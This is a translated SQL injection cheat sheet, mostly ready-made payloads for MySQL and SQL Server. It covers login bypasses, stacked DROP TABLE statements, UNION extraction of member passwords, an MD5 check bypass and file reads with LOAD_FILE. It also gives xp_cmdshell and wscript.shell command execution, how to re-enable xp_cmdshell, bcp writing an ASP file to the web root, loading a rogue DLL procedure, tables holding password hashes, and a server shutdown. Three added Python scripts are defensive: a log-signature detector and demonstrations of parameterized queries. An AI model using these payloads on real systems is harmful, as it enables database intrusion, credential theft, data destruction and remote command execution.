SQL injection cheat sheet (part 1)
0x00 SQL injection cheat sheet
Currently only MySQL, Microsoft SQL Server, and parts of Oracle and PostgreSQL are covered. Most examples are not guaranteed to apply to every scenario: in practice the injection language, the code environment, and the variety of uncommon or even odd SQL statements all change from case to case.
The examples only serve to give the reader the basic concept of "a potential attack", and almost every part has a concise summary.
M: MySQL   S: SQL Server   P: PostgreSQL   O: Oracle   +: (probably) all other databases
Example:
(MS) stands for MySQL and SQL Server. (M*S) stands for MySQL only in some versions or special circumstances (explained below the entry), and SQL Server.

0x01 Contents
Syntax reference, attack examples and injection tips
- Line comments; SQL injection attack example using line comments
- Inline comments; injection attack example using inline comments; MySQL version detection example
- Stacked queries; languages/databases that support stacked queries; about MySQL and PHP; stacked injection attack example
- If statements; MySQL If statement; SQL Server If statement; If statement injection attack example
- Integers; hex injection attack example
- String operations; string concatenation; strings without quotes; hex injection attack example
- String modification and related functions; Union injection; UNION language issue handling
- Bypassing the login screen (SMO+); bypassing the MD5 hash check on a login screen; MD5 hash check bypass example (MSP)
- Error-based: using HAVING to detect field names (S); using ORDER BY to find the number of fields (MSO+); data types, UNION, etc.; finding the field type
- Simple injection (MSO+)
- Useful functions, information collection, built-in procedures, a large number of injection notes: @@version (MS); file insert (Bulk Insert) (S); BCP (S); VBS/WSH in SQL Server (S); running system commands with xp_cmdshell (S); some special tables in SQL Server (S); other SQL Server built-in procedures (S); a large number of MSSQL notes
- Injection using LIMIT (M) or ORDER (MSO)
- Shutting down SQL Server (S)
- Enabling xp_cmdshell in SQL Server 2005
- Detecting the SQL Server database structure (S): getting user-defined tables; getting field names; moving records (S)
- Quick extraction with error-based SQL Server injection (S)

0x02 Syntax reference, attack examples and injection tips
Line comments
Comment out the rest of the query.
A line comment is usually used to comment out the rest of the query so that you do not have to repair the whole syntax.
-- (SM)
DROP sampletable;--
# (M)
DROP sampletable;#
Example of an SQL injection attack using a line comment
Username: admin'--
Statement: SELECT * FROM members WHERE username = 'admin'-- ' AND password = 'password'
This lets you log in as admin, because the rest of the SQL statement is commented out.

Inline comments
Comment out the rest of the query by leaving the comment unclosed, or use inline comments to bypass filters, remove spaces, obfuscate, or detect the database version.
/* comment */ (SM)
DROP/*comment*/sampletable
DR/**/OP/*bypass filtering*/sampletable
SELECT/*replace space*/password/**/FROM/**/Members
/*! MySQL special */ (M)
This is MySQL-only syntax and is ideal for detecting the MySQL version. Code written inside the comment is executed only by MySQL, and with a version number in front of it the code runs only on servers newer than that version.
SELECT /*!32302 1/0, */ 1 FROM tablename
Injection attack example using inline comments
ID: 10; DROP TABLE members /*
You can also use: 10; DROP TABLE members --
MySQL version detection example
SELECT /*!32302 1/0, */ 1 FROM tablename
If the MySQL version is higher than 3.23.02, a division-by-zero error is thrown.
ID: /*!32302 10*/
ID: 10
If the MySQL version is higher than 3.23.02, the two queries above return the same result.
Stacked queries
Execute multiple statements in one query. This is very useful at any injection point, especially against SQL Server back ends.
; (S)
SELECT * FROM members; DROP members --
Ends one query and starts a new one.
Languages/databases that support stacked queries
(The original shows a support table here: green = supported, dark gray = not supported, light gray = unknown.)
About MySQL and PHP
To clarify some issues:
PHP-MySQL does not support stacked queries, and Java does not support stacked queries (I am sure about ORACLE, and I am not sure about others). In general, MySQL supports stacked queries, but the database layers of most PHP-MySQL application frameworks cannot execute the second query. Maybe the MySQL client supports this; I'm not sure. Can someone confirm it?
(Translator's note: the MySQL 5.6.20 client supports stacked queries.)
Stacked injection attack example
ID: 10; DROP members --
Statement: SELECT * FROM products WHERE id = 10; DROP members --
After the normal query runs, the DROP query runs.
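Whether the DROP above actually runs depends on the database layer as much as on the engine, which is the point of the PHP/MySQL note in this section. The following Python script is an added example (not from the original cheat sheet): it sends the stacked payload quoted above through two SQLite APIs, Connection.execute(), which accepts one statement, and executescript(), which runs every statement in the string. SQLite stands in for the back end and the table contents are constructed, so it runs offline.

```python
"""Does the database layer run a second, stacked statement?

Added example (not from the original cheat sheet). SQLite stands in for the
back end and the table contents are constructed, so it runs offline. The
point matches the PHP/MySQL note above: whether the DROP runs depends on
the client API, not only on the engine.
"""
import sqlite3

INJECTED_ID = "10; DROP TABLE members --"    # payload quoted from the page


def fresh_db() -> sqlite3.Connection:
    """Constructed schema: a products table and a members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, product TEXT)")
    conn.execute("CREATE TABLE members (id INTEGER, user TEXT)")
    conn.execute("INSERT INTO products VALUES (10, 'widget')")
    conn.execute("INSERT INTO members VALUES (1, 'admin')")
    return conn


def members_table_exists(conn: sqlite3.Connection) -> bool:
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = 'members'"
    ).fetchone()
    return row is not None


def run_with_single_statement_api(conn: sqlite3.Connection, user_id: str) -> str:
    """Connection.execute() prepares exactly one statement; anything after it
    other than whitespace or comments is rejected before the SELECT runs."""
    sql = "SELECT * FROM products WHERE id = " + user_id
    try:
        conn.execute(sql).fetchall()
        return "executed"
    except (sqlite3.Error, sqlite3.Warning) as exc:   # Warning on older Pythons
        return "rejected: " + str(exc)


def run_with_script_api(conn: sqlite3.Connection, user_id: str) -> str:
    """Connection.executescript() runs every statement in the string, so the
    same concatenated SQL now drops the table."""
    sql = "SELECT * FROM products WHERE id = " + user_id
    conn.executescript(sql)
    return "executed"


def demo() -> dict:
    """Whether the members table survives the payload under each API."""
    single = fresh_db()
    run_with_single_statement_api(single, INJECTED_ID)
    script = fresh_db()
    run_with_script_api(script, INJECTED_ID)
    return {"single_statement_api": members_table_exists(single),
            "script_api": members_table_exists(script)}


if __name__ == "__main__":
    print(run_with_single_statement_api(fresh_db(), INJECTED_ID))
    print(demo())
```

The same concatenated SQL is rejected by one API and fully executed by the other, so an application that switches from a single-statement call to a multi-statement call (or a driver option that enables it) turns a harmless injection into a destructive one without any change to the query text.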
If statements
Get a response based on an If statement. This is one of the keys to blind SQL injection, and it also allows simple, accurate tests.
MySQL If statement
IF(condition, true-part, false-part) (M)
SELECT IF(1=1, 'true', 'false')
SQL Server If statement
IF condition true-part ELSE false-part (S)
IF (1=1) SELECT 'true' ELSE SELECT 'false'
If statement injection attack example
IF ((SELECT user) = 'sa' OR (SELECT user) = 'dbo') SELECT 1 ELSE SELECT 1/0 (S)
If the current user is not "sa" or "dbo", a divide-by-zero error is thrown.
Integers
Very useful for bypassing filters such as magic_quotes() and similar, and even various WAFs.
0xHEXNUMBER (SM)
(HEXNUMBER: a hexadecimal number.) Hexadecimal numbers can be used as follows:
SELECT CHAR(0x66) (S)
SELECT 0x5045 (M) (this is not an integer but a hex-encoded string)
SELECT 0x50 + 0x45 (M) (now this is an integer)
String operations
String-related operations. These are useful for building injections that contain no quotation marks, for bypassing other filters, or for detecting the back-end database.
String concatenation
+ (S)
SELECT login + '-' + password FROM members
|| (*MO)
SELECT login || '-' || password FROM members
* In MySQL, "||" concatenates only in ANSI mode. Otherwise it is treated as a logical OR and returns 0. A better way is the CONCAT() function.
CONCAT(str1, str2, str3, ...) (M)
Concatenates all string arguments: SELECT CONCAT(login, password) FROM members
Strings without quotes
There are many ways to build strings, but these methods are always available: use CHAR() (MS) and CONCAT() (M) to generate a string without quotes.
0x457578 (M) - hex-encoded string
SELECT 0x457578
MySQL treats this as a string.
A simple way to produce a hex string in MySQL: SELECT CONCAT('0x', HEX('c:\boot.ini'))
Using the CONCAT() function in MySQL: SELECT CONCAT(CHAR(75), CHAR(76), CHAR(77)) (M)
This returns 'KLM'
SELECT CHAR(75) + CHAR(76) + CHAR(77) (S)
This returns 'KLM'
Hex injection attack example
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
This displays the contents of c:\boot.ini
String modification and related functions
ASCII() (SMP)
Returns the ASCII value of the leftmost character. This is an important function for blind injection.
Example: SELECT ASCII('a')
CHAR() (SM)
Converts an integer to an ASCII character.
Example: SELECT CHAR(64)
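A detection rule that only looks for quotation marks misses the 0xHEX and CHAR()/CONCAT() encodings described in the two sections above. The following Python script is an added example, not part of the original cheat sheet: it decodes those encodings back to ordinary quoted strings before matching injection signatures, then runs the result over a few constructed web-server log lines carrying query fragments quoted on this page (the UNION/LOAD_FILE query, the stacked DROP, the CONCAT(CHAR()) string, the versioned comment, and the ' or 1=1 -- payload). The log lines, the signature names and the helper functions are all this example's own assumptions.

```python
"""Decode quote-free string encodings before matching SQLi signatures.

Added example (not from the original cheat sheet). The log lines are
constructed; the query fragments inside them are the ones quoted on this
page. Signature names and the helper functions are this example's own.
"""
import re
from urllib.parse import unquote_plus, urlsplit

CHAR_CALL = re.compile(r"\bCHAR\(\s*(0x[0-9a-fA-F]+|\d+)\s*\)", re.IGNORECASE)
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{2,})\b")
QUOTE_JOIN = re.compile(r"'\s*\+\s*'|',\s*'")      # 'K'+'L' or 'K','L' -> 'KL'
CONCAT_ONE = re.compile(r"\bCONCAT\(\s*('[^']*')\s*\)", re.IGNORECASE)

# Indicators matched against the normalized text, in this order.
SIGNATURES = [
    ("comment_token", re.compile(r"--|#|/\*")),
    ("mysql_versioned_comment", re.compile(r"/\*!\d*")),
    ("stacked_statement", re.compile(r";\s*(?:DROP|INSERT|UPDATE|DELETE|EXEC|SHUTDOWN)\b", re.I)),
    ("union_select", re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I)),
    ("tautology", re.compile(r"'\s*OR\s+'?\d+'?\s*=\s*'?\d+", re.I)),
    ("file_or_shell_function", re.compile(r"\b(?:LOAD_FILE|xp_cmdshell|sp_oacreate)\b", re.I)),
]


def _decode_char(match) -> str:
    """CHAR(75) or CHAR(0x4B) -> 'K' (printable ASCII only)."""
    arg = match.group(1)
    code = int(arg, 16) if arg.lower().startswith("0x") else int(arg)
    return "'" + chr(code) + "'" if 32 <= code < 127 else match.group(0)


def _decode_hex(match) -> str:
    """0x633A5C... -> 'c:\\boot.ini' when the digits form printable ASCII.
    Odd-length or non-text hex (a real number) is left untouched."""
    digits = match.group(1)
    if len(digits) % 2:
        return match.group(0)
    try:
        text = bytes.fromhex(digits).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return match.group(0)
    return "'" + text + "'" if text.isprintable() else match.group(0)


def normalize(fragment: str) -> str:
    """Rewrites the quote-free encodings into ordinary quoted strings.
    (0x50 + 0x45 is integer arithmetic in MySQL; for matching purposes it
    is still decoded as text, which is what the attacker wanted anyway.)"""
    text = CHAR_CALL.sub(_decode_char, fragment)
    text = HEX_LITERAL.sub(_decode_hex, text)
    text = QUOTE_JOIN.sub("", text)        # 'K'+'L'+'M' / 'K','L','M' -> 'KLM'
    return CONCAT_ONE.sub(r"\1", text)     # CONCAT('KLM') -> 'KLM'


def indicators(fragment: str) -> list:
    """Names of the signatures that match after normalization."""
    text = normalize(fragment)
    return [name for name, pattern in SIGNATURES if pattern.search(text)]


def query_from_log_line(line: str) -> str:
    """Pulls the URL-decoded query string out of a combined-format log line."""
    found = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    return unquote_plus(urlsplit(found.group(1)).query) if found else ""


def scan(lines) -> list:
    """(line index, normalized query, indicator names) for each flagged line."""
    flagged = []
    for index, line in enumerate(lines):
        query = query_from_log_line(line)
        hits = indicators(query)
        if hits:
            flagged.append((index, normalize(query), hits))
    return flagged


# Constructed access-log lines; only the query fragments come from the page.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=10 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /item.php?id=10%20UNION%20ALL%20SELECT%201,%20LOAD_FILE(0x633A5C626F6F742E696E69) HTTP/1.1" 200 2048',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /item.php?id=10;%20DROP%20TABLE%20members%20-- HTTP/1.1" 500 0',
    '203.0.113.5 - - [10/Oct/2023:13:55:48 +0000] "GET /item.php?id=-1%20UNION%20SELECT%20name,%20CONCAT(CHAR(75),CHAR(76),CHAR(77))%20FROM%20members HTTP/1.1" 200 640',
    '203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /item.php?id=/*!32302%2010*/ HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:56 +0000] "GET /login.php?user=%27%20or%201=1%20--&pass=x HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for index, query, hits in scan(LOG_LINES):
        print(f"line {index}: {hits}\n    {query}")
```

The normalization step is deliberately lossy (a legitimate IN ('a','b') list is also folded), so it belongs in the detection path, never in the query path; the value of the decoded text is that an analyst sees c:\boot.ini and KLM instead of a hex blob when triaging the alert.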
Union injection
With UNION you can query across tables. The simplest use is to inject a query so that it returns the contents of another table:
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
This merges the contents of the news table and the members table and returns them together.
Another example: ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1 --
UNION language issue handling
When injecting with UNION you often hit errors caused by different language settings (table settings, field settings, table or database settings, etc.). These methods help with those problems, especially when dealing with Japanese, Russian, or Turkish.
Use COLLATE SQL_Latin1_General_Cp1254_CS_AS (S)
or another collation; check the SQL Server documentation yourself. Example: SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members
HEX() (M)
Works every time.
Bypassing the login screen (SMO+)
SQL injection 101 (probably the original title), login tips
admin' --
admin' #
admin'/*
' or 1=1 --
' or 1=1 #
' or 1=1 /*
') or '1'='1 --
') or ('1'='1 --
....
Log in as a different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1 --
* Earlier versions of MySQL do not support UNION
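To show why the payloads above work and what closes the hole, here is an added example (not from the original cheat sheet) in Python: a login check that concatenates user input into the WHERE clause beside the same check with bound parameters, run against an in-memory SQLite table with constructed data. SQLite honours the same -- line comment that the admin' -- and ' or 1=1 -- payloads rely on; the # and /* variants are MySQL syntax and are not used here. The table, column and function names are this example's own.

```python
"""Login check by string concatenation versus bound parameters.

Added example (not from the original cheat sheet). The members table and
its contents are constructed; SQLite stands in for the back end so the
script runs offline.
"""
import sqlite3

# Login-bypass payloads quoted from the list above (the ones SQLite can parse).
PAYLOADS = ["admin' --", "' or 1=1 --"]


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin account with a made-up password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.execute("INSERT INTO members VALUES ('admin', 'constructed-secret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the SQL from raw input. The quote in the payload closes the
    string literal and the trailing -- comments out the password check, so
    the statement that actually runs is
    SELECT * FROM members WHERE username = 'admin' --' AND password = '...'."""
    sql = ("SELECT * FROM members WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with bound parameters: the driver sends the input as a
    value, never as SQL text, so admin' -- is compared literally against
    the username column and matches nothing."""
    sql = "SELECT * FROM members WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def compare(payload: str, password: str = "wrong") -> tuple:
    """Returns (vulnerable_result, parameterized_result) for one payload."""
    conn = make_db()
    return (login_vulnerable(conn, payload, password),
            login_parameterized(conn, payload, password))


if __name__ == "__main__":
    for p in PAYLOADS:
        vulnerable, safe = compare(p)
        print(f"{p!r:16} concatenated={vulnerable}  parameterized={safe}")
```

Both payloads log in through the concatenated version with a wrong password and fail through the parameterized one, while a genuine username and password still succeed, which is the whole defence: the comment and quote tricks in this section only matter when input can become part of the SQL text.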
Bypassing the MD5 hash check on a login screen
If the application first fetches the password's MD5 by user name and then compares it with the MD5 of the password you supplied, you need some extra tricks to get past the check. You can supply the MD5 hash of a known plaintext together with that plaintext, so that the program compares the hash you provided instead of the hash read from the database.
MD5 hash check bypass example (MSP)
Username: admin
Password: 1234' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
Error-based: using HAVING to detect field names (S)
' HAVING 1=1 --
' GROUP BY table.columnfromerror1 HAVING 1=1 --
' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
......
' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --
Continue until it no longer reports an error; then you have all the fields used in the SELECT query.
Using ORDER BY to find the number of fields (MSO+)
Using ORDER BY to detect the number of fields speeds up UNION injection.
ORDER BY 1 --
ORDER BY 2 --
......
ORDER BY n --
Continue until it returns an error; the last number that succeeded is the number of fields.
Data types, UNION, etc.
Tips:
Use UNION together with ALL, because fields with identical values are common and UNION by default returns only distinct records.
If the page shows only one record per query, do not waste that record slot on the rows the original query returns normally: make the original query match nothing with -1 or a value that does not exist (provided that the injection point is in WHERE).
Use NULL in UNION injections. For most data types this works better than blindly guessing string, date, number and so on.
Be careful when judging whether an error comes from the application or from the database, because ASP.NET often throws errors when NULL is used (developers generally did not expect NULL in the username box).
Finding the field type
' UNION SELECT SUM(columntofind) FROM users-- (S)
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
If no error is returned, the field is numeric.
Similarly, you can use CAST() and CONVERT():
SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONVERT(image, 1), NULL, NULL, NULL, NULL, NULL, NULL--
11223344) UNION SELECT NULL, NULL, NULL, NULL WHERE 1=2 --
No error: the syntax is correct and this is MS SQL Server syntax. Continue.
11223344) UNION SELECT 1, NULL, NULL, NULL WHERE 1=2 --
No error: the first field is an integer.
11223344) UNION SELECT 1, 2, NULL, NULL WHERE 1=2 --
Error: the second field is not an integer.
11223344) UNION SELECT 1, '2', NULL, NULL WHERE 1=2 --
No error: the second field is a string.
11223344) UNION SELECT 1, '2', 3, NULL WHERE 1=2 --
Error: the third field is not an integer.
......
Microsoft OLE DB Provider for SQL Server error '80040e07' Explicit conversion from data type int to image is not allowed.
You hit CONVERT() errors before UNION errors, so use CONVERT() first and then UNION.
Simple injection (MSO+)
'; INSERT INTO users VALUES (1, 'hax0r', 'coolpass', 9)/*
Useful functions, information collection, built-in procedures, a large number of injection notes
@@version (MS)
The database version. This is a constant: you can select it as a field without naming a table, and you can also use it in INSERT/UPDATE statements or even in functions.
INSERT INTO members (id, user, pass) VALUES (1, '' + SUBSTRING(@@version, 1, 10), 10)
File insert (Bulk Insert) (S)
Inserts the contents of a file into a table. If you do not know the application directory, you can read the IIS metabase file (IIS 6 only, %systemroot%\system32\inetsrv\MetaBase.xml) and find the application directory in it.
CREATE TABLE foo (line varchar(8000)); BULK INSERT foo FROM 'c:\inetpub\wwwroot\login.asp'
Repeat for other files.
BCP (S)
Writes files. This utility requires a login:
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
VBS/WSH in SQL Server (S)
With ActiveX support you can use VBS/WSH inside SQL Server.
DECLARE @o int; EXEC sp_oacreate 'wscript.shell', @o out; EXEC sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; DECLARE @o int; EXEC sp_oacreate 'wscript.shell', @o out; EXEC sp_oamethod @o, 'run', NULL, 'notepad.exe' --
Running system commands, xp_cmdshell (S)
As is well known, it is disabled by default in SQL Server 2005. You need admin permission.
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
A simple ping test. Check the firewall log or a sniffer when using it.
EXEC master.dbo.xp_cmdshell 'ping '
With an error, a UNION, or anything else, you cannot read the result directly.
Some special tables in SQL Server (S)
Error messages
master..sysmessages
Linked servers
master..sysservers
Passwords (both the 2000 and 2005 versions can be cracked; the two hashing algorithms are similar)
SQL Server 2000: master..sysxlogins
SQL Server 2005: sys.sql_logins
Other SQL Server built-in procedures (S)
Command execution (xp_cmdshell)
EXEC master..xp_cmdshell 'dir'
Registry operations (xp_regread)
xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumkeys, xp_regenumvalues, xp_regread, xp_regremovemultistring, xp_regwrite
EXEC xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
EXEC xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
Managing services (xp_servicecontrol)
Media (xp_availablemedia)
ODBC resources (xp_enumdsn)
Login mode (xp_loginconfig)
Creating Cab files (xp_makecab)
Domain enumeration (xp_ntsec_enumdomains)
Killing a process (needs the PID) (xp_terminate_process)
Adding a new procedure (you can then do whatever you want)
sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
EXEC xp_webserver
Writing a text file to a UNC or internal path (sp_makewebtask)
A large number of MSSQL notes
SELECT * FROM master..sysprocesses /* WHERE spid = @@SPID */
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe'; IF (@result = 0) SELECT 0 ELSE SELECT 1/0
HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell 'OSQL /Q"DBCC SHOWCONTIG"'
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
You cannot use a subquery (sub-select) in an INSERT query in SQL Server.
Injection using LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1, 'x'/*, 10;
If the injection point is in the second parameter of LIMIT, you can comment out the rest or use UNION injection.
Shutting down SQL Server (S)
If you are really in a hurry: '; shutdown --
Enabling xp_cmdshell in SQL Server 2005
By default, dangerous built-in procedures such as xp_cmdshell are disabled in SQL Server 2005. If you have admin permissions, you can turn them on.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Detecting the SQL Server database structure (S)
Getting user-defined tables
SELECT name FROM sysobjects WHERE xtype = 'U'
Getting field names
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
Moving records (S)
Modify the WHERE clause to use NOT IN or NOT EXISTS:
... WHERE users NOT IN ('first user', 'second user')
SELECT TOP 1 name FROM members WHERE NOT EXISTS (SELECT TOP 0 name FROM members) -- this one is useful
Dirty tricks
SELECT * FROM Product WHERE id = 2 AND 1 = CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id <= o.id) AS x, name FROM sysobjects o) AS p WHERE p.x = 3) AS int)
SELECT p.name FROM (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype = 'U' AND i.id <= o.id) AS x, name FROM sysobjects o WHERE o.xtype = 'U') AS p WHERE p.x = 21
Quick extraction with error-based SQL Server injection (S)
'; BEGIN DECLARE @rd varchar(8000); SET @rd = ':'; SELECT @rd = @rd + ' ' + name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'members') AND name > @rd; SELECT @rd AS rd INTO TMP_SYS_TMP; END;--